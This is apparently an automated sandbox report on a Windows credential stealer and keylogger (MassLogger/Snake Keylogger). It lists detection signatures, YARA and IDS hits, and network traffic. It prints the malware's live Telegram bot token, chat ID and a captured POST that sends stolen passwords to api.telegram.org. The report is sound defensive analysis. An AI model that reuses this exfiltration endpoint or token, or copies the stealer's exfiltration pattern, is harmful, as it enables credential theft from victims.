Windows Analysis Report
mnXS9meqtB.exe

Overview

General Information

Sample name: mnXS9meqtB.exe
(renamed because original name is a hash value)
Original sample name: 8bf61f3a1d267156d16c19ef19476210c7aca81406afafd7abbf139a5ccf61a1.exe
Analysis ID: 1589080
MD5: aa367f8d203cd02f8a82a1a351baf271
SHA1: 60c3c395682962497b9425572b869052d2eb4135
SHA256: 8bf61f3a1d267156d16c19ef19476210c7aca81406afafd7abbf139a5ccf61a1
Tags: exe, MassLogger, user-adrian__luca

Detection

MassLogger RAT, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MassLogger RAT
Yara detected PureLog Stealer
Yara detected Telegram RAT
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • mnXS9meqtB.exe (PID: 6836 cmdline: "C:\Users\user\Desktop\mnXS9meqtB.exe" MD5: AA367F8D203CD02F8A82A1A351BAF271)
    • RegSvcs.exe (PID: 6892 cmdline: "C:\Users\user\Desktop\mnXS9meqtB.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU", "Telegram Chatid": "1695799026"}
Yara matches (Source | Rule | Description | Author | Strings)

Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_MassLogger | Description: Yara detected MassLogger RAT | Author: Joe Security
Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_TelegramRAT | Description: Yara detected Telegram RAT | Author: Joe Security
Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp | Rule: JoeSecurity_PureLogStealer | Description: Yara detected PureLog Stealer | Author: Joe Security
Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp | Rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Description: unknown | Author: unknown
          • 0x1d811:$a1: get_encryptedPassword
          • 0x1d7e5:$a2: get_encryptedUsername
          • 0x1d8a9:$a3: get_timePasswordChanged
          • 0x1d7c1:$a4: get_passwordField
          • 0x1d827:$a5: set_encryptedPassword
          • 0x1d5f4:$a7: get_logins
          • 0x1cb66:$a8: GetOutlookPasswords
          • 0x1c07a:$a9: StartKeylogger
          • 0x1aadb:$a10: KeyLoggerEventArgs
          • 0x1aaaa:$a11: KeyLoggerEventArgsEventHandler
          • 0x1d6c8:$a13: _encryptedPassword
Source: 2.2.RegSvcs.exe.400000.0.raw.unpack | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen
Source: 2.2.RegSvcs.exe.400000.0.unpack | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen
Source: 0.2.mnXS9meqtB.exe.3150000.1.raw.unpack | Rule: MALWARE_Win_RedLine | Description: Detects RedLine infostealer | Author: ditekSHen
Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack | Rule: JoeSecurity_MassLogger | Description: Yara detected MassLogger RAT | Author: Joe Security
Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack | Rule: JoeSecurity_CredentialStealer | Description: Yara detected Credential Stealer | Author: Joe Security
              No Sigma rule has matched
Suricata IDS alerts

Timestamp                        | SID     | Severity | Classtype                                      | Source IP    | Source Port | Destination IP  | Destination Port | Protocol
2025-01-11T09:15:31.912304+0100 | 2057744 | 1        | Malware Command and Control Activity Detected | 192.168.2.12 | 49713       | 149.154.167.220 | 443              | TCP
2025-01-11T09:15:24.902370+0100 | 2803274 | 2        | Potentially Bad Traffic                       | 192.168.2.12 | 49711       | 193.122.6.168   | 80               | TCP
2025-01-11T09:15:30.980555+0100 | 2803274 | 2        | Potentially Bad Traffic                       | 192.168.2.12 | 49711       | 193.122.6.168   | 80               | TCP
2025-01-11T09:15:31.627549+0100 | 1810008 | 1        | Potentially Bad Traffic                       | 192.168.2.12 | 49713       | 149.154.167.220 | 443              | TCP


              AV Detection

Source: 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU", "Telegram Chatid": "1695799026"}
Source: RegSvcs.exe.6892.2.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendMessage"}
Source: mnXS9meqtB.exe | Virustotal: Detection: 56%
Source: mnXS9meqtB.exe | ReversingLabs: Detection: 79%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: mnXS9meqtB.exe | Joe Sandbox ML: detected

              Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: mnXS9meqtB.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49712 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49713 version: TLS 1.2
Source: Binary string: _.pdb | source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP | source: mnXS9meqtB.exe, 00000000.00000003.2334385755.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003640000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: mnXS9meqtB.exe, 00000000.00000003.2334385755.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003640000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00346CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00346CA9
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_003460DD
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_003463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_003463F9
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0034EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0034EB60
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0034F56F FindFirstFileW,FindClose, 0_2_0034F56F
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0034F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0034F5FA
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00351B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00351B2F
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00351C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00351C8A
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00351F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00351F94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 2_2_02B1E0B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0306F179h 2_2_0306EEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0306F8CFh 2_2_0306F4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0306F8CFh 2_2_0306F7FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0306F8CFh 2_2_0306F49F

              Networking

Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.12:49713 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.12:49713 -> 149.154.167.220:443
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695799026&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31ee33dc5b19 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View | IP Address: 193.122.6.168 193.122.6.168
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49711 -> 193.122.6.168:80
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49712 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00354EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile, 0_2_00354EB5
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695799026&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd31ee33dc5b19 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000318C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003119000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778781040.0000000005432000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: RegSvcs.exe, 00000002.00000002.4777410564.00000000031C0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003119000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
Source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot-/sendDocument?chat_id=
Source: RegSvcs.exe, 00000002.00000002.4777410564.0000000003249000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7817497413:AAH6fX2oZGM3XzbbIU69SVEGO80t6mDhjdU/sendDocument?chat_id=1695
Source: RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: RegSvcs.exe, 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000002.00000002.4777410564.000000000319E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189x
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49713 version: TLS 1.2
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00356B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_00356B0C
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00356D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_00356D07
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_00342B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 0_2_00342B37
Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: 0_2_0036F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_0036F7FF

              System Summary

              Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 0.2.mnXS9meqtB.exe.3150000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 00000002.00000002.4776143140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
              Source: 00000000.00000002.2347142574.0000000003150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects RedLine infostealer | Author: ditekSHen
              Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
              Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
              Source: C:\Users\user\Desktop\mnXS9meqtB.exe | Code function: This is a third-party compiled AutoIt script. | 0_2_00303D19
              Source: mnXS9meqtB.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
              Source: mnXS9meqtB.exe, 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_7194bfb9-3
              Source: mnXS9meqtB.exe, 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: 3SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_f1be00a7-c
              Source: mnXS9meqtB.exe | String found in binary or memory: This is a third-party compiled AutoIt script. | memstr_8952f4c4-9
              Source: mnXS9meqtB.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer | memstr_d5200829-c
